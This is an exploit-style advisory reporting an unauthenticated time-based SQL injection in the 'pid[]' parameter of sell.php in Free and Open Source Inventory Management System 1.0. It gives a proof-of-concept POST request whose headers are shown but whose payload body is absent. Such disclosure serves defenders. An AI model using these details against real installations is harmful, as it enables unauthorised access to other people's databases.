Authored by Sefa Ozan

Free and Open Source Inventory Management System version 1.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: Free and Open Source Inventory Management System 1.0 - Unauthenticated SQL Injection
# Exploit Author: Sefa Ozan
# Date: 16/09/2023
# Vendor: MAYURIK
# Vendor Homepage:
# Software Link:
# Tested on: Windows 10 Pro & Ubuntu 22.04

## Description:
The `pid[]` parameter is vulnerable to Time Based SQL injection attacks. To prove the existence of the vulnerability, the database was put to sleep for 10 seconds.

## Request:
POST /ample/app/action/sell.php HTTP/1.1
Host: localhost
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Length: 297
Content-Type: application/x-www-form-urlencoded